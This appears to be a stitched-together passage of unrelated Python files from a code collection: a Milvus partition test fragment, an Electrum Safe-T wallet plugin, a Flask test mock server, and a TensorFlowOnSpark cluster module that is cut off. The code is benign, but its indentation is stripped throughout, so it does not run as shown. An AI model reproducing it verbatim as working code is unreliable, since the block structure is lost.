message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
mock_server.py
|
import logging
import os
from threading import Thread
from uuid import uuid4
from typing import List
from flask import Flask, jsonify, Response, request
import requests
LOGGER = logging.getLogger(__name__)
# based on https://gist.github.com/eruvanos/f6f62edb368a20aaa880e12976620db8
class MockServer:
def __init__(self, port=12345):
self.thread = Thread(target=self._run)
self.port = port
self.app = Flask(__name__)
self.url = "http://localhost:%s" % self.port
self.app.add_url_rule("/shutdown", view_func=self._shutdown_server)
def _shutdown_server(self):
request.environ['werkzeug.server.shutdown']()
return 'Server shutting down...'
def _run(self):
self.app.run(port=self.port)
def start(self):
self.thread.start()
def stop(self):
requests.get("http://localhost:%s/shutdown" % self.port)
self.thread.join()
def add_callback_response(
self, url: str, callback: callable, methods=('GET',)):
callback.__name__ = str(uuid4()) # change name of method to mitigate flask exception
self.app.add_url_rule(url, view_func=callback, methods=methods)
return os.path.join(self.url, url.lstrip('/'))
def add_multiple_callbacks_response(
self, url: str, callbacks: List[callable], methods=('GET',)):
callback_it = iter(callbacks)
def _callback():
next_callback = next(callback_it)
response = next_callback()
LOGGER.debug('responding with: %s (callback: %s)', response, next_callback)
return response
return self.add_callback_response(url, _callback, methods=methods)
def add_json_response(self, url, serializable, methods=('GET',)):
def _callback():
return jsonify(serializable)
return self.add_callback_response(url, _callback, methods=methods)
def add_response(self, url, body, methods=('GET',), **kwargs):
def _callback():
return Response(body, **kwargs)
return self.add_callback_response(url, _callback, methods=methods)
|
TFSparkNode.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""This module provides low-level functions for managing the TensorFlowOnSpark cluster."""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import json
import logging
import multiprocessing
import os
import platform
import socket
import subprocess
import sys
import uuid
import time
import traceback
from threading import Thread
from . import TFManager
from . import TFNode
from . import compat
from . import gpu_info
from . import marker
from . import reservation
from . import util
logger = logging.getLogger(__name__)
class TFNodeContext:
"""Encapsulates unique metadata for a TensorFlowOnSpark node/executor and provides methods to interact with Spark and HDFS.
An instance of this object will be passed to the TensorFlow "main" function via the `ctx` argument.
To simply the end-user API, this class now mirrors the functions of the TFNode module.
Args:
:executor_id: integer identifier for this executor, per ``nodeRDD = sc.parallelize(range(num_executors), num_executors).``
:job_name: TensorFlow job name (e.g. 'ps' or 'worker') of this TF node, per cluster_spec.
:task_index: integer rank per job_name, e.g. "worker:0", "worker:1", "ps:0".
:cluster_spec: dictionary for constructing a tf.train.ClusterSpec.
:defaultFS: string representation of default FileSystem, e.g. ``file://`` or ``hdfs://<namenode>:8020/``.
:working_dir: the current working directory for local filesystems, or YARN containers.
:mgr: TFManager instance for this Python worker.
"""
def __init__(self, executor_id=0, job_name='', task_index=0, cluster_spec={}, defaultFS='file://', working_dir='.', mgr=None):
self.worker_num = executor_id # for backwards-compatibility
self.executor_id = executor_id
self.job_name = job_name
self.task_index = task_index
self.cluster_spec = cluster_spec
self.num_workers = sum([len(v) for k, v in cluster_spec.items() if k == 'master' or k == 'chief' or k == 'worker'])
self.defaultFS = defaultFS
self.working_dir = working_dir
self.mgr = mgr
def absolute_path(self, path):
"""Convenience function to access ``TFNode.hdfs_path`` directly from this object instance."""
return TFNode.hdfs_path(self, path)
def start_cluster_server(self, num_gpus=1, rdma=False):
"""Convenience function to access ``TFNode.start_cluster_server`` directly from this object instance."""
return TFNode.start_cluster_server(self, num_gpus, rdma)
def export_saved_model(self, sess, export_dir, tag_set, signatures):
"""Convenience function to access ``TFNode.export_saved_model`` directly from this object instance."""
TFNode.export_saved_model(sess, export_dir, tag_set, signatures)
def get_data_feed(self, train_mode=True, qname_in='input', qname_out='output', input_mapping=None):
"""Convenience function to access ``TFNode.DataFeed`` directly from this object instance."""
return TFNode.DataFeed(self.mgr, train_mode, qname_in, qname_out, input_mapping)
class TFSparkNode(object):
"""Low-level functions used by the high-level TFCluster APIs to manage cluster state.
**This class is not intended for end-users (see TFNode for end-user APIs)**.
For cluster management, this wraps the per-node cluster logic as Spark RDD mapPartitions functions, where the RDD is expected to be
a "nodeRDD" of the form: ``nodeRDD = sc.parallelize(range(num_executors), num_executors)``.
For data feeding, this wraps the feeding logic as Spark RDD mapPartitions functions on a standard "dataRDD".
This also manages a reference to the TFManager "singleton" per executor. Since Spark can spawn more than one python-worker
per executor, this will reconnect to the "singleton" instance as needed.
"""
mgr = None #: TFManager instance
cluster_id = None #: Unique ID for a given TensorFlowOnSpark cluster, used for invalidating state for new clusters.
def _get_manager(cluster_info, host, executor_id):
"""Returns this executor's "singleton" instance of the multiprocessing.Manager, reconnecting per python-worker if needed.
Args:
:cluster_info: cluster node reservations
:host: host IP address
:executor_id: unique id per executor (created during initial call to run())
Returns:
TFManager instance for this executor/python-worker
"""
for node in cluster_info:
if node['host'] == host and node['executor_id'] == executor_id:
addr = node['addr']
authkey = node['authkey']
TFSparkNode.mgr = TFManager.connect(addr, authkey)
break
if TFSparkNode.mgr is None:
msg = "No TFManager found on this node, please ensure that:\n" + \
"1. Spark num_executors matches TensorFlow cluster_size\n" + \
"2. Spark cores/tasks per executor is 1.\n" + \
"3. Spark dynamic allocation is disabled."
raise Exception(msg)
logger.info("Connected to TFSparkNode.mgr on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get('state'))))
return TFSparkNode.mgr
def run(fn, tf_args, cluster_meta, tensorboard, log_dir, queues, background):
"""Wraps the user-provided TensorFlow main function in a Spark mapPartitions function.
Args:
:fn: TensorFlow "main" function provided by the user.
:tf_args: ``argparse`` args, or command line ``ARGV``. These will be passed to the ``fn``.
:cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc).
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:queues: *INTERNAL_USE*
:background: boolean indicating if the TensorFlow "main" function should be run in a background process.
Returns:
A nodeRDD.mapPartitions() function.
"""
def _mapfn(iter):
import tensorflow as tf
from packaging import version
# Note: consuming the input iterator helps Pyspark re-use this worker,
for i in iter:
executor_id = i
# check that there are enough available GPUs (if using tensorflow-gpu) before committing reservation on this node
if compat.is_gpu_available():
num_gpus = tf_args.num_gpus if 'num_gpus' in tf_args else 1
gpus_to_use = gpu_info.get_gpus(num_gpus)
# assign TF job/task based on provided cluster_spec template (or use default/null values)
job_name = 'default'
task_index = -1
cluster_id = cluster_meta['id']
cluster_template = cluster_meta['cluster_template']
for jobtype in cluster_template:
nodes = cluster_template[jobtype]
if executor_id in nodes:
job_name = jobtype
task_index = nodes.index(executor_id)
break
# get unique key (hostname, executor_id) for this executor
host = util.get_ip_address()
util.write_executor_id(executor_id)
port = 0
# check for existing TFManagers
if TFSparkNode.mgr is not None and str(TFSparkNode.mgr.get('state')) != "'stopped'":
if TFSparkNode.cluster_id == cluster_id:
# raise an exception to force Spark to retry this "reservation" task on another executor
raise Exception("TFManager already started on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get("state"))))
else:
# old state, just continue with creating new manager
logger.warn("Ignoring old TFManager with cluster_id {0}, requested cluster_id {1}".format(TFSparkNode.cluster_id, cluster_id))
# start a TFManager and get a free port
# use a random uuid as the authkey
authkey = uuid.uuid4().bytes
addr = None
if job_name in ('ps', 'evaluator'):
# PS nodes must be remotely accessible in order to shutdown from Spark driver.
TFSparkNode.mgr = TFManager.start(authkey, ['control', 'error'], 'remote')
addr = (host, TFSparkNode.mgr.address[1])
else:
# worker nodes only need to be locally accessible within the executor for data feeding
TFSparkNode.mgr = TFManager.start(authkey, queues)
addr = TFSparkNode.mgr.address
# initialize mgr state
TFSparkNode.mgr.set('state', 'running')
TFSparkNode.cluster_id = cluster_id
# expand Hadoop classpath wildcards for JNI (Spark 2.x)
if 'HADOOP_PREFIX' in os.environ:
classpath = os.environ['CLASSPATH']
hadoop_path = os.path.join(os.environ['HADOOP_PREFIX'], 'bin', 'hadoop')
hadoop_classpath = subprocess.check_output([hadoop_path, 'classpath', '--glob']).decode()
logger.debug("CLASSPATH: {0}".format(hadoop_classpath))
os.environ['CLASSPATH'] = classpath + os.pathsep + hadoop_classpath
# start TensorBoard if requested, on 'worker:0' if available (for backwards-compatibility), otherwise on 'chief:0' or 'master:0'
job_names = sorted([k for k in cluster_template.keys() if k in ['chief', 'master', 'worker']])
tb_job_name = 'worker' if 'worker' in job_names else job_names[0]
tb_pid = 0
tb_port = 0
if tensorboard and job_name == tb_job_name and task_index == 0:
tb_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tb_sock.bind(('', 0))
tb_port = tb_sock.getsockname()[1]
tb_sock.close()
logdir = log_dir if log_dir else "tensorboard_%d" % executor_id
# search for tensorboard in python/bin, PATH, and PYTHONPATH
pypath = sys.executable
pydir = os.path.dirname(pypath)
sys_path = os.pathsep.join(sys.path)
search_path = os.pathsep.join([pydir, sys_path, os.environ['PATH'], os.environ['PYTHONPATH']])
tb_path = util.find_in_path(search_path, 'tensorboard') # executable in PATH
if not tb_path:
tb_path = util.find_in_path(search_path, 'tensorboard/main.py') # TF 1.3+
if not tb_path:
tb_path = util.find_in_path(search_path, 'tensorflow/tensorboard/__main__.py') # TF 1.2-
if not tb_path:
raise Exception("Unable to find 'tensorboard' in: {}".format(search_path))
# launch tensorboard
if version.parse(tf.__version__) >= version.parse('2.0.0'):
tb_proc = subprocess.Popen([pypath, tb_path, "--reload_multifile=True", "--logdir=%s" % logdir, "--port=%d" % tb_port], env=os.environ)
else:
tb_proc = subprocess.Popen([pypath, tb_path, "--logdir=%s" % logdir, "--port=%d" % tb_port], env=os.environ)
tb_pid = tb_proc.pid
# check server to see if this task is being retried (i.e. already reserved)
client = reservation.Client(cluster_meta['server_addr'])
cluster_info = client.get_reservations()
tmp_sock = None
node_meta = None
for node in cluster_info:
(nhost, nexec) = (node['host'], node['executor_id'])
if nhost == host and nexec == executor_id:
node_meta = node
port = node['port']
# if not already done, register everything we need to set up the cluster
if node_meta is None:
# first, find a free port for TF
tmp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp_sock.bind(('', port))
port = tmp_sock.getsockname()[1]
node_meta = {
'executor_id': executor_id,
'host': host,
'job_name': job_name,
'task_index': task_index,
'port': port,
'tb_pid': tb_pid,
'tb_port': tb_port,
'addr': addr,
'authkey': authkey
}
# register node metadata with server
logger.info("TFSparkNode.reserve: {0}".format(node_meta))
client.register(node_meta)
# wait for other nodes to finish reservations
cluster_info = client.await_reservations()
client.close()
# construct a TensorFlow clusterspec from cluster_info
sorted_cluster_info = sorted(cluster_info, key=lambda k: k['executor_id'])
cluster_spec = {}
last_executor_id = -1
for node in sorted_cluster_info:
if (node['executor_id'] == last_executor_id):
raise Exception("Duplicate worker/task in cluster_info")
last_executor_id = node['executor_id']
logger.info("node: {0}".format(node))
(njob, nhost, nport) = (node['job_name'], node['host'], node['port'])
hosts = [] if njob not in cluster_spec else cluster_spec[njob]
hosts.append("{0}:{1}".format(nhost, nport))
cluster_spec[njob] = hosts
# update TF_CONFIG if cluster spec has a 'master' node (i.e. tf.estimator)
if 'master' in cluster_spec or 'chief' in cluster_spec:
tf_config = json.dumps({
'cluster': cluster_spec,
'task': {'type': job_name, 'index': task_index},
'environment': 'cloud'
})
logger.info("export TF_CONFIG: {}".format(tf_config))
os.environ['TF_CONFIG'] = tf_config
# reserve GPU(s) again, just before launching TF process (in case situation has changed)
if compat.is_gpu_available():
# compute my index relative to other nodes on the same host (for GPU allocation)
my_addr = cluster_spec[job_name][task_index]
my_host = my_addr.split(':')[0]
flattened = [v for sublist in cluster_spec.values() for v in sublist]
local_peers = [p for p in flattened if p.startswith(my_host)]
my_index = local_peers.index(my_addr)
num_gpus = tf_args.num_gpus if 'num_gpus' in tf_args else 1
gpus_to_use = gpu_info.get_gpus(num_gpus, my_index)
gpu_str = "GPUs" if num_gpus > 1 else "GPU"
logger.debug("Requested {} {}, setting CUDA_VISIBLE_DEVICES={}".format(num_gpus, gpu_str, gpus_to_use))
os.environ['CUDA_VISIBLE_DEVICES'] = gpus_to_use
# create a context object to hold metadata for TF
ctx = TFNodeContext(executor_id, job_name, task_index, cluster_spec, cluster_meta['default_fs'], cluster_meta['working_dir'], TFSparkNode.mgr)
# release port reserved for TF as late as possible
if tmp_sock is not None:
tmp_sock.close()
# Background mode relies reuse of python worker in Spark.
if background:
# However, reuse of python worker can't work on Windows, we need to check if the current
# script runs on Windows or not.
if os.name == 'nt' or platform.system() == 'Windows':
raise Exception("Background mode is not supported on Windows.")
# Check if the config of reuse python worker is enabled on Spark.
if not os.environ.get("SPARK_REUSE_WORKER"):
raise Exception("Background mode relies reuse of python worker on Spark. This config 'spark.python.worker.reuse' is not enabled on Spark. Please enable it before using background.")
def wrapper_fn(args, context):
"""Wrapper function that sets the sys.argv of the executor."""
if isinstance(args, list):
sys.argv = args
fn(args, context)
def wrapper_fn_background(args, context):
"""Wrapper function that signals exceptions to foreground process."""
errq = TFSparkNode.mgr.get_queue('error')
try:
wrapper_fn(args, context)
except Exception:
errq.put(traceback.format_exc())
if job_name in ('ps', 'evaluator') or background:
# invoke the TensorFlow main function in a background thread
logger.info("Starting TensorFlow {0}:{1} as {2} on cluster node {3} on background process".format(
job_name, task_index, job_name, executor_id))
p = multiprocessing.Process(target=wrapper_fn_background, args=(tf_args, ctx))
if job_name in ('ps', 'evaluator'):
p.daemon = True
p.start()
# for ps and evaluator nodes, wait indefinitely in foreground thread for a "control" event (None == "stop")
if job_name in ('ps', 'evaluator'):
queue = TFSparkNode.mgr.get_queue('control')
equeue = TFSparkNode.mgr.get_queue('error')
done = False
while not done:
while (queue.empty() and equeue.empty()):
time.sleep(1)
if (not equeue.empty()):
e_str = equeue.get()
raise Exception("Exception in " + job_name + ":\n" + e_str)
msg = queue.get(block=True)
logger.info("Got msg: {0}".format(msg))
if msg is None:
logger.info("Terminating {}".format(job_name))
TFSparkNode.mgr.set('state', 'stopped')
done = True
queue.task_done()
else:
# otherwise, just run TF function in the main executor/worker thread
logger.info("Starting TensorFlow {0}:{1} on cluster node {2} on foreground thread".format(job_name, task_index, executor_id))
wrapper_fn(tf_args, ctx)
logger.info("Finished TensorFlow {0}:{1} on cluster node {2}".format(job_name, task_index, executor_id))
return _mapfn
def train(cluster_info, cluster_meta, feed_timeout=600, qname='input'):
"""Feeds Spark partitions into the shared multiprocessing.Queue.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
:cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc)
:feed_timeout: number of seconds after which data feeding times out (600 sec default)
:qname: *INTERNAL_USE*
Returns:
A dataRDD.mapPartitions() function
"""
def _train(iter):
# get shared queue, reconnecting if necessary
mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
try:
queue = mgr.get_queue(qname)
equeue = mgr.get_queue('error')
